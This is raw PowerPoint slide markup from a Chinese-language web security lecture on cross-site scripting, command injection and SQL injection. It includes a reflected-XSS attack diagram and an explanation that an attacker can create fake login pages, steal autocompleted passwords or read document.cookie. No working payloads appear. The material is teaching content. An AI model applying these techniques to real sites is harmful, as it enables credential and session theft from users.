            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>，并向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>的小工具，让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>www.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>上运行脚本。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="135000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>4.attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>现在可以：（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>）在正确的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>处创建虚假登录页面，（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>）窃取用户的自动完成（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>auto-completed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>）密码，或者（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>）等待用户（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>）使用另一个窗口登录，并阅读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2081276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83076" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283077" name="Rectangle 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="3309938"/>
            <a:ext cx="6400800" cy="652462"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入的背景</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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346" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1752600"/>
            <a:ext cx="7620000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> XSS)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90" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="8382000" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基本情景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12291" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2601913"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12292" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5959475" y="4979988"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5564188" y="1905000"/>
            <a:ext cx="2436812" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12294" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="1524000"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12295" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5675550" y="4552950"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>受害服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12296" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="687388"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3902742"/>
            <a:ext cx="1467068" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>受害客户端</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="660066"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12298" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2937004" y="1733520"/>
            <a:ext cx="1720599" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>站点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12299" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="773112"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12300" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2887457" y="2270095"/>
            <a:ext cx="1980029" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>接受恶意的链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12301" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12302" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654175" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>点击链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12303" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="2638425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>响应用户输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12304" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1949450"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12305" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="2606675"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12306" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="3705225"/>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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12307" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="1162050"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12308" name="Straight Arrow Connector 36"/>
